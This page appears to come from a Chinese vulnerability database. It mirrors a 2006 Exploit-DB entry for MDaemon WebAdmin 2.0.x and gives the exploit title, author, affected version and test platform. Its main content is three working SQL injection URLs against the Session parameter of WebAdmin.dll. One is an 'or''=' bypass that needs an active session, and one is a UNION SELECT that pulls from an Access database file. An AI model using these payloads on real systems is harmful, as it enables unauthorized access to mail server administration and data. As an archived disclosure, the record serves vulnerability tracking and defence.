MDaemon WebAdmin 2.0.x - SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1055719 漏洞类型
发布时间 2006-05-26 更新时间 2006-05-26
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/10225
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title: MDaemon WebAdmin 2.0.X SQL injection
# Date: 2006/5/26
# Author: KOUSULIN
# Software Link: http://archive.altn.com/WebAdmin/Archive/2.0.8/wa208_en.exe
# Version: WebAdmin 2.0.X
# Tested on: Windows 2003
# CVE : N/A
# Code :

/WebAdmin.dll?Session='[ACCESS SQL INJ]&View=User

/WebAdmin.dll?Session='or''='&View=User  # need a active session

/WebAdmin.dll?Session='UNION SELECT * FROM A IN 'C:\ZZZ' WHERE ''='&View=User